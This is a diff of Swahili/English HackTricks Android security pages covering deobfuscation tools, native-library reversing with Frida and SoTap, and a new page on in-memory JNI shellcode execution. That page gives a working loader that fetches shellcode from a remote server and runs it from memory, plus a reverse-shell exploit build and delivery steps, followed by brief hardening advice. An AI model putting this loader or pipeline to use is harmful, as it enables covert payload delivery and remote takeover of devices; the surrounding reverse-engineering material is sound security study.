Unaweza upload an obfuscated APK kwenye platform yao.
Unaweza kupakia APK iliyofichwa kwenye jukwaa lao.
### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app
Hii ni zana ya LLM kutafuta potential security vulnerabilities katika android apps na deobfuscate android app code. Inatumia Google's Gemini public API.
Hii ni zana ya LLM ya kugundua udhaifu wowote unaowezekana wa usalama katika android apps na ku-deobfuscate android app code. Inatumia Google's Gemini public API.
### [Simplify](https://github.com/CalebFenton/simplify)
It is a **generic android deobfuscator.** Simplify **virtually executes an app** to understand its behavior and then **tries to optimize the code** so it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn't matter what the specific type of obfuscation is used.
Ni generic android deobfuscator. Simplify virtually executes an app ili kuelewa tabia yake kisha inajaribu kuboresha code ili itendeke sawa lakini iwe rahisi kwa mwanadamu kuelewa. Kila aina ya uboreshaji ni rahisi na jumla, hivyo haijalishi ni aina gani mahsusi ya obfuscation ilitumika.
### [APKiD](https://github.com/rednaga/APKiD)
APKiD gives you information about **how an APK was made**. It identifies many **compilers**, **packers**, **obfuscators**, and other weird stuff. It's [_PEiD_](https://www.aldeid.com/wiki/PEiD) for Android.
APKiD inakupa taarifa kuhusu jinsi APK ilivyotengenezwa. Inatambua compilers, packers, obfuscators, na vitu vingine vya kushangaza. Ni [_PEiD_](https://www.aldeid.com/wiki/PEiD) kwa Android.
### Manual
[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)
[Soma mafunzo haya kujifunza mbinu za jinsi ya reverse custom obfuscation](manual-deobfuscation.md)
## Labs
### [Androl4b](https://github.com/sh4hin/Androl4b)
AndroL4b ni Android security virtual machine inayotegemea ubuntu-mate inayojumuisha mkusanyiko wa latest framework, tutorials na labs kutoka kwa security geeks na researchers kwa ajili ya reverse engineering na malware analysis.
AndroL4b ni virtual machine ya usalama wa Android inayotegemea ubuntu-mate inayojumuisha mkusanyiko wa mifumo ya hivi karibuni, mafunzo na maabara kutoka kwa wapenzi mbalimbali wa usalama na watafiti kwa reverse engineering na malware analysis.
## References
@ -820,15 +824,11 @@ AndroL4b ni Android security virtual machine inayotegemea ubuntu-mate inayojumui
- [https://maddiestone.github.io/AndroidAppRE/](https://maddiestone.github.io/AndroidAppRE/) Android quick course
- [https://manifestsecurity.com/android-application-security/](https://manifestsecurity.com/android-application-security/)
- [https://github.com/Ralireza/Android-Security-Teryaagh](https://github.com/Ralireza/Android-Security-Teryaagh)
- [https://www.youtube.com/watch?v=PMKnPaGWxtg\&feature=youtu.be\&ab_channel=B3nacSec](https://www.youtube.com/watch?v=PMKnPaGWxtg&feature=youtu.be&ab_channel=B3nacSec)
- [https://www.youtube.com/watch?v=PMKnPaGWxtg&feature=youtu.be&ab_channel=B3nacSec](https://www.youtube.com/watch?v=PMKnPaGWxtg&feature=youtu.be&ab_channel=B3nacSec)
- [SSLPinDetect: Advanced SSL Pinning Detection for Android Security Analysis](https://petruknisme.medium.com/sslpindetect-advanced-ssl-pinning-detection-for-android-security-analysis-1390e9eca097)
- [SSLPinDetect GitHub](https://github.com/aancw/SSLPinDetect)
- [smali-sslpin-patterns](https://github.com/aancw/smali-sslpin-patterns)
- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
## Yet to try
- [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
- [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
- [CoRPhone — Android in-memory JNI execution and packaging pipeline](https://github.com/0xdevil/corphone)
{{#include ../../banners/hacktricks-training.md}}

121
src/mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md Normal file
View File

@ -0,0 +1,121 @@
# Android Utekelezaji wa Msimbo wa Native Kwenye Kumbukumbu kupitia JNI (shellcode)
{{#include ../../banners/hacktricks-training.md}}
Ukurasa huu unaandika mfumo wa vitendo wa kutekeleza native payloads kikamilifu kwenye kumbukumbu kutoka kwa mchakato wa app ya Android isiyoaminika kwa kutumia JNI. Mtiririko unazuia kuunda binary yoyote ya native kwenye diski: download raw shellcode bytes over HTTP(S), ipite kwa JNI bridge, allocate RX memory, na ruka ndani yake.
Kwa nini ni muhimu
- Inapunguza artefakti za forensi (hakuna ELF kwenye diski)
- Inafaa kwa “stage-2” native payloads zilizotengenezwa kutoka binary ya exploit ya ELF
- Inalingana na tradecraft inayotumiwa na malware ya kisasa na red teams
Mfumo wa juu
1) Pakua shellcode bytes katika Java/Kotlin
2) Call a native method (JNI) with the byte array
3) Katika JNI: allocate RW memory → copy bytes → mprotect to RX → call entrypoint
Mfano minimal
Java/Kotlin side
```java
public final class NativeExec {
static { System.loadLibrary("nativeexec"); }
public static native int run(byte[] sc);
}
// Download and execute (simplified)
byte[] sc = new java.net.URL("https://your-server/sc").openStream().readAllBytes();
int rc = NativeExec.run(sc);
```
Upande la C JNI (arm64/amd64)
```c
#include <jni.h>
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>
static inline void flush_icache(void *p, size_t len) {
__builtin___clear_cache((char*)p, (char*)p + len);
}
JNIEXPORT jint JNICALL
Java_com_example_NativeExec_run(JNIEnv *env, jclass cls, jbyteArray sc) {
jsize len = (*env)->GetArrayLength(env, sc);
if (len <= 0) return -1;
// RW anonymous buffer
void *buf = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (buf == MAP_FAILED) return -2;
jboolean isCopy = 0;
jbyte *bytes = (*env)->GetByteArrayElements(env, sc, &isCopy);
if (!bytes) { munmap(buf, len); return -3; }
memcpy(buf, bytes, len);
(*env)->ReleaseByteArrayElements(env, sc, bytes, JNI_ABORT);
// Make RX and execute
if (mprotect(buf, len, PROT_READ | PROT_EXEC) != 0) { munmap(buf, len); return -4; }
flush_icache(buf, len);
int (*entry)(void) = (int (*)(void))buf;
int ret = entry();
// Optional: restore RW and wipe
mprotect(buf, len, PROT_READ | PROT_WRITE);
memset(buf, 0, len);
munmap(buf, len);
return ret;
}
```
Vidokezo na tahadhari
- W^X/execmem: Android ya kisasa inatekeleza W^X; anonymous PROT_EXEC mappings bado kwa ujumla zinaruhusiwa kwa app processes yenye JIT (subject to SELinux policy). Vifaa/ROMs vingine vinaweka vizuizi; rudi kutumia JIT-allocated exec pools au native bridges inapohitajika.
- Architectures: Hakikisha shellcode architecture inaendana na kifaa (arm64-v8a commonly; x86 only on emulators).
- Entrypoint contract: Amua convention kwa entry ya shellcode yako (no args vs structure pointer). Iweka position-independent (PIC).
- Stability: Clear instruction cache kabla ya kuruka; mismatched cache inaweza kusababisha crash kwenye ARM.
Packaging ELF → positionindependent shellcode
A robust operator pipeline is to:
- Build your exploit as a static ELF with musl-gcc
- Convert the ELF into a selfloading shellcode blob using pwntools shellcraft.loader_append
Build
```bash
musl-gcc -O3 -s -static -fno-pic -o exploit exploit.c \
-DREV_SHELL_IP="\"10.10.14.2\"" -DREV_SHELL_PORT="\"4444\""
```
Geuza ELF kuwa shellcode ghafi (mfano amd64)
```python
# exp2sc.py
from pwn import *
context.clear(arch='amd64')
elf = ELF('./exploit')
loader = shellcraft.loader_append(elf.data, arch='amd64')
sc = asm(loader)
open('sc','wb').write(sc)
print(f"ELF size={len(elf.data)}, shellcode size={len(sc)}")
```
Kwa nini loader_append inafanya kazi: hutoa loader ndogo inayopanga segments za programu za ELF zilizowekwa ndani ya memory na kuhamisha udhibiti kwa entrypoint yake, ikikupa raw blob moja inayoweza ku-memcpy na kutekelezwa na app.
Delivery
- Host sc on an HTTP(S) server you control
- The backdoored/test app downloads sc and invokes the JNI bridge shown above
- Listen on your operator box for any reverse connection the kernel/user-mode payload establishes
Validation workflow for kernel payloads
- Tumia simbolized vmlinux kwa reversing ya haraka/urejeshaji wa offsets
- Prototype primitives on a convenient debug image if available, but always re-validate on the actual Android target (kallsyms, KASLR slide, page-table layout, and mitigations differ)
Hardening/Detection (blue team)
- Zuia anonymous PROT_EXEC katika app domains pale inapowezekana (SELinux policy)
- Lazimishe strict code integrity (hakuna dynamic native loading kutoka network) na thibitisha update channels
- Monitor mmap/mprotect transitions zisizo za kawaida kwenda RX na kunakili kwa wingi kwa byte-array kabla ya jumps
References
- [CoRPhone challenge repo (Android kernel pwn; JNI memory-only loader pattern)](https://github.com/0xdevil/corphone)
- [build.sh (musl-gcc + pwntools pipeline)](https://raw.githubusercontent.com/0xdevil/corphone/main/exploit/build.sh)
- [exp2sc.py (pwntools shellcraft.loader_append)](https://raw.githubusercontent.com/0xdevil/corphone/main/exploit/exp2sc.py)
- [exploit.c TL;DR (operator/kernel flow, offsets, reverse shell)](https://raw.githubusercontent.com/0xdevil/corphone/main/exploit/exploit.c)
- [INSTRUCTIONS.md (setup notes)](https://github.com/0xdevil/corphone/blob/main/INSTRUCTIONS.md)
{{#include ../../banners/hacktricks-training.md}}

81
src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
View File

@ -1,16 +1,16 @@
# Kuchambua Maktaba za Asili
# Uchambuzi wa Maktaba za Native
{{#include ../../banners/hacktricks-training.md}}
**Kwa taarifa zaidi angalia:** [**https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html)
**Kwa taarifa za ziada angalia:** [**https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html)
Programu za Android zinaweza kutumia maktaba za asili, mara nyingi zilizotungwa kwa C au C++, kwa kazi zinazohitaji utendaji wa juu. Waumba wa malware pia hutumia maktaba hizi kwa sababu ELF shared objects bado ni ngumu zaidi decompile ikilinganishwa na DEX/OAT byte-code.
Ukurasa huu unalenga kwenye mtiririko wa kazi wa *vitendo* na maboresho ya zana *ya hivi karibuni* (2023-2025) ambayo yanafanya kuchambua faili za Android `.so` kuwa rahisi zaidi.
Apps za Android zinaweza kutumia maktaba za native, kwa kawaida zilizoandikwa kwa C au C++, kwa kazi zinazohitaji utendakazi mkubwa. Waandishi wa malware pia hutumia maktaba hizi kwa sababu ELF shared objects bado ni ngumu zaidi ku-decompile kuliko DEX/OAT byte-code.
Ukurasa huu unalenga mitiririko ya kazi ya *vitendo* na maboresho ya zana za *karibuni* (2023-2025) yanayofanya kureverse mafaili ya `.so` ya Android kuwa rahisi.
---
### Mtiririko wa uchunguzi wa haraka kwa `libfoo.so` iliyotolewa hivi karibuni
### Mbinu ya uchunguzi wa haraka kwa `libfoo.so` iliyopigwa hivi punde
1. **Toa maktaba**
```bash
@ -25,26 +25,26 @@ file libfoo.so # arm64 or arm32 / x86
readelf -h libfoo.so # OS ABI, PIE, NX, RELRO, etc.
checksec --file libfoo.so # (peda/pwntools)
```
3. **Orodhesha alama zilizotumwa nje & vifungo vya JNI**
3. **Orodhesha exported symbols & JNI bindings**
```bash
readelf -s libfoo.so | grep ' Java_' # dynamic-linked JNI
strings libfoo.so | grep -i "RegisterNatives" -n # static-registered JNI
```
4. **Pakia katika decompiler** (Ghidra ≥ 11.0, IDA Pro, Binary Ninja, Hopper or Cutter/Rizin) na endesha uchambuzi otomatiki.
Toleo jipya la Ghidra limeleta decompiler ya AArch64 inayotambua PAC/BTI stubs na MTE tags, ikiboresha sana uchambuzi wa maktaba zilizojengwa kwa NDK ya Android 14.
4. **Pakia katika decompiler** (Ghidra ≥ 11.0, IDA Pro, Binary Ninja, Hopper or Cutter/Rizin) na endesha auto-analysis.
Toleo jipya la Ghidra liliingiza decompiler ya AArch64 inayotambua PAC/BTI stubs na MTE tags, ikiboresha sana uchambuzi wa maktaba zilizojengwa kwa Android 14 NDK.
5. **Amua kati ya static vs dynamic reversing:** code iliyokatwa au iliyofichwa mara nyingi inahitaji *instrumentation* (Frida, ptrace/gdbserver, LLDB).
---
### Instrumentation ya Dynamic (Frida ≥ 16)
### Dynamic Instrumentation (Frida ≥ 16)
Mfululizo wa Frida 16 ulileta maboresho kadhaa maalumu kwa Android ambayo husaidia pale lengo linapotumia optimizations za kisasa za Clang/LLD:
Fridas 16-series ilileta maboresho kadhaa maalumu kwa Android yanayosaidia wakati lengo linapotumia optimisations za kisasa za Clang/LLD:
* `thumb-relocator` sasa inaweza *hook* tiny ARM/Thumb functions zinazozalishwa na alignment kali ya LLD (`--icf=all`).
* Kukagua na kure-bind *ELF import slots* kunafanya kazi kwenye Android, kuruhusu patching kwa kila module kwa `dlopen()`/`dlsym()` wakati inline hooks zinapokataa.
* Java hooking ilirekebishwa kwa **ART quick-entrypoint** mpya inayotumika wakati apps zime-compile kwa `--enable-optimizations` kwenye Android 14.
* `thumb-relocator` sasa inaweza *ku-hook functions ndogo za ARM/Thumb* zilizotengenezwa na alignment kali ya LLD (`--icf=all`).
* Kuorodhesha na kurebind ELF import slots kunafanya kazi kwenye Android, kuwezesha patching per-module ya `dlopen()`/`dlsym()` wakati inline hooks zinakubaliwa.
* Java hooking ilirekebishwa kwa ART quick-entrypoint mpya inayotumika wakati apps zinapojengwa na `--enable-optimizations` kwenye Android 14.
Mfano: kuorodhesha functions zote zilizosasishwa kupitia `RegisterNatives` na ku-dump anwani zao wakati wa runtime:
Mfano: kuorodhesha functions zote zilizosajiliwa kupitia `RegisterNatives` na kutupa anwani zao wakati wa runtime:
```javascript
Java.perform(function () {
var Runtime = Java.use('java.lang.Runtime');
@ -61,29 +61,29 @@ console.log('[+] RegisterNatives on ' + clazz.getName() + ' -> ' + count + ' met
});
});
```
Frida itafanya kazi bila marekebisho kwenye vifaa vya PAC/BTI (Pixel 8/Android 14+) mradi tu utumie frida-server 16.2 au toleo jipya zaidi — matoleo ya awali yalishindwa kutambua padding kwa inline hooks.
Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later earlier versions failed to locate padding for inline hooks.
### Telemetry ya ndani ya mchakato ya JNI kupitia .so iliyopangwa kabla (SoTap)
### Process-local JNI telemetry via preloaded .so (SoTap)
Wakati instrumentation yenye sifa kamili ni zaidi ya kinachohitajika au imezuiliwa, bado unaweza kupata uonekano wa kiwango cha native kwa kupakia kabla logger ndogo ndani ya mchakato lengwa. SoTap ni maktaba nyepesi ya Android native (.so) inayorekodi tabia ya wakati wa utekelezaji ya maktaba nyingine za JNI (.so) ndani ya mchakato huo wa app (no root required).
Wakati instrumentation yenye vipengele kamili ni kupita kiasi au imezuiwa, bado unaweza kupata uonekano wa ngazi ya native kwa ku-preload logger ndogo ndani ya mchakato lengwa. SoTap ni maktaba nyepesi ya Android native (.so) inayorekodi tabia ya wakati wa utekelezaji ya maktaba nyingine za JNI (.so) ndani ya mchakato moja la app (hakuna root inahitajika).
Sifa muhimu:
- Inaanza mapema na inafuatilia mwingiliano wa JNI/native ndani ya mchakato unaoipakia.
- Inahifadhi logs kwa kutumia njia mbalimbali zinazoweza kuandikwa na ina fallback ya heshima kwa Logcat wakati uhifadhi umezuiliwa.
- Inayoweza kubadilishwa kwenye chanzo: hariri sotap.c ili kupanua/kubadilisha kinachorekodiwa na ujenge upya kwa kila ABI.
Key properties:
- Inaanzishwa mapema na inachunguza mwingiliano wa JNI/native ndani ya mchakato unaoiweka.
- Inaendelea kuhifadhi logs ikitumia njia mbalimbali zinazoweza kuandikwa na kwa upendeleo inarudi kwa Logcat wakati uhifadhi umezuiliwa.
- Inayoweza kubadilishwa chanzo: hariri sotap.c ili kupanua/rekebisha kinachorekodiwa na ujenge upya kwa kila ABI.
Usanidi (repack the APK):
1) Weka build sahihi ya ABI ndani ya APK ili loader iweze kutatua libsotap.so:
Setup (repack the APK):
1) Drop the proper ABI build into the APK so the loader can resolve libsotap.so:
- lib/arm64-v8a/libsotap.so (for arm64)
- lib/armeabi-v7a/libsotap.so (for arm32)
2) Hakikisha SoTap inapakuliwa kabla ya maktaba nyingine za JNI. Inject a call early (e.g., Application subclass static initializer or onCreate) ili logger ianzishwe kwanza. Smali snippet example:
2) Ensure SoTap loads before other JNI libs. Inject a call early (e.g., Application subclass static initializer or onCreate) so the logger is initialized first. Smali snippet example:
```smali
const-string v0, "sotap"
invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V
```
3) Rebuild/sign/install, run the app, then collect logs.
Njia za logi (zinakaguliwa kwa mpangilio):
Log paths (checked in order):
```
/data/user/0/%s/files/sotap.log
/data/data/%s/files/sotap.log
@ -100,37 +100,48 @@ This approach is useful for malware triage and JNI debugging where observing nat
---
### See also: inmemory native code execution via JNI
A common attack pattern is to download a raw shellcode blob at runtime and execute it directly from memory through a JNI bridge (no ondisk ELF). Details and readytouse JNI snippet here:
{{#ref}}
in-memory-jni-shellcode-execution.md
{{#endref}}
---
### Recent vulnerabilities worth hunting for in APKs
| Year | CVE | Affected library | Notes |
| Mwaka | CVE | Maktaba iliyoathirika | Maelezo |
|------|-----|------------------|-------|
|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
|2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|
Unapogundua *third-party* `.so` files ndani ya APK, hakikisha unalinganisha hash yao dhidi ya advisories za upstream. SCA (Software Composition Analysis) haiko kawaida kwenye mobile, kwa hivyo builds zilizozee zenye udhaifu ni nyingi.
When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
---
### Anti-Reversing & Hardening trends (Android 13-15)
* **Pointer Authentication (PAC) & Branch Target Identification (BTI):** Android 14 inawezesha PAC/BTI katika system libraries kwenye silicon inayounga mkono ARMv8.3+. Decompilers sasa zinaonyesha PACrelated pseudo-instructions; kwa dynamic analysis Frida inaingiza trampolines *after* stripping PAC, lakini trampolines zako za kawaida zinapaswa kuita `pacda`/`autibsp` inapofaa.
* **MTE & Scudo hardened allocator:** memory-tagging ni opt-in lakini apps nyingi zinazotumia Play-Integrity zinajenga kwa `-fsanitize=memtag`; tumia `setprop arm64.memtag.dump 1` pamoja na `adb shell am start ...` ili kushika tag faults.
* **LLVM Obfuscator (opaque predicates, control-flow flattening):** commercial packers (e.g., Bangcle, SecNeo) zinazilinda zaidi *native* code, si Java pekee; tarajia bogus control-flow na encrypted string blobs katika `.rodata`.
* **Pointer Authentication (PAC) & Branch Target Identification (BTI):** Android 14 enables PAC/BTI in system libraries on supported ARMv8.3+ silicon. Decompilers now display PACrelated pseudo-instructions; for dynamic analysis Frida injects trampolines *after* stripping PAC, but your custom trampolines should call `pacda`/`autibsp` where necessary.
* **MTE & Scudo hardened allocator:** memory-tagging is opt-in but many Play-Integrity aware apps build with `-fsanitize=memtag`; use `setprop arm64.memtag.dump 1` plus `adb shell am start ...` to capture tag faults.
* **LLVM Obfuscator (opaque predicates, control-flow flattening):** commercial packers (e.g., Bangcle, SecNeo) increasingly protect *native* code, not only Java; expect bogus control-flow and encrypted string blobs in `.rodata`.
---
### Resources
### Rasilimali
- **Learning ARM Assembly:** [Azeria Labs ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/)
- **JNI & NDK Documentation:** [Oracle JNI Spec](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) · [Android JNI Tips](https://developer.android.com/training/articles/perf-jni) · [NDK Guides](https://developer.android.com/ndk/guides/)
- **Debugging Native Libraries:** [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
- **Kujifunza ARM Assembly:** [Azeria Labs ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/)
- **JNI & NDK Nyaraka:** [Oracle JNI Spec](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) · [Android JNI Tips](https://developer.android.com/training/articles/perf-jni) · [NDK Guides](https://developer.android.com/ndk/guides/)
- **Kudebuga Native Libraries:** [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
### References
### Marejeo
- Frida 16.x change-log (Android hooking, tiny-function relocation) [frida.re/news](https://frida.re/news/)
- NVD advisory for `libwebp` overflow CVE-2023-4863 [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863)
- SoTap: Lightweight in-app JNI (.so) behavior logger [github.com/RezaArbabBot/SoTap](https://github.com/RezaArbabBot/SoTap)
- SoTap Releases [github.com/RezaArbabBot/SoTap/releases](https://github.com/RezaArbabBot/SoTap/releases)
- How to work with SoTap? [t.me/ForYouTillEnd/13](https://t.me/ForYouTillEnd/13)
- [CoRPhone — JNI memory-only execution pattern and packaging](https://github.com/0xdevil/corphone)
{{#include ../../banners/hacktricks-training.md}}